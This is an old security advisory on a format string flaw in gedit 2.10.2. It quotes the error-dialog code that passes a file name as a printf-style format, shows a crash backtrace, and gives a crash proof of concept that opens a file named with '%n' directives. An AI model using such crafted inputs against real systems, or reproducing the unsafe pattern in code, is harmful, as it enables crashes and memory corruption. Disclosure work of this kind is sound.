pst.advisory: gedit fun. opensource is god .lol windows

    Created: 2005-05-20
    Article type: original
    Submitted by: jsk__ (jsk_at_ph4nt0m.org)

    Systems affected:

    gedit 2.10.2

    Not affected:

    (none listed)

    All affected versions are exploitable.

    1: Why: gedit is a powerful tool, used to edit *.c, *.pl, *.py and so on.

    When it opens a binary file, the file name ends up being used as a format string in the error dialog, so it is exploitable.


    2: Tips (the vulnerable code):


    void
    gedit_utils_error_reporting_loading_file (
            const gchar *uri,
            const GeditEncoding *encoding,
            GError *error,
            GtkWindow *parent)
    {
        /* ... */

        if (error_message == NULL)
        {
            if ((error == NULL) || (error->message == NULL))
                /* the display name of the file is embedded into the message here */
                error_message = g_strdup_printf (
                                        _("Could not open the file \"%s\"."),
                                        uri_for_display);
            else
                /* same here: error_message now carries the attacker-chosen file name */
                error_message = g_strdup_printf (
                                        _("Could not open the file \"%s\".\n\n%s."),
                                        uri_for_display, error->message);
        }

        g_free (encoding_name);

        dialog = gtk_message_dialog_new (
                parent,
                GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT,
                GTK_MESSAGE_ERROR,
                GTK_BUTTONS_OK,
                error_message);   /* boom: error_message is passed as the printf-style
                                     message_format parameter instead of as data */
      

    3: More (gdb backtrace of the crash):

    Program received signal SIGSEGV, Segmentation fault.
    0x40f9b740 in gtk_window_set_transient_for () from /usr/lib/libgtk-x11-2.0.so.0
    (gdb) bt
    #0  0x40f9b740 in gtk_window_set_transient_for ()
       from /usr/lib/libgtk-x11-2.0.so.0
    #1  0x40ea33c9 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
    #2  0x080723a1 in gedit_utils_error_reporting_loading_file ()
    #3  0x080779f8 in gedit_file_open_from_stdin ()
    #4  0x00000000 in ?? ()
    #5  0x083f98e8 in ?? ()
    #6  0x0813f538 in ?? ()
    #7  0x080ad668 in TC_GNOME_Gedit_Application_struct ()
    #8  0x08339e30 in ?? ()
    #9  0x00000000 in ?? ()
    #10 0x41287ca1 in __default_morecore () from /lib/libc.so.6


    4: A lame proof-of-concept

    bash-2.05b#cat fmtexp.c

    #include <stdio.h>

    int
    main(void)
    {
      printf("hah gedit\n");
      return 0;
    }


    bash-2.05b#gcc -o fk fmtexp.c

    bash-2.05b#mv fk AA%n%n%n.c

    bash-2.05b#gedit  AA%n%n%n.c

    No working exploit will be published here. :P



    CREDIT:

    jsk (www.0xbadexworm.org) discovered this vulnerability.

    Thanks: all members of PST, and doris.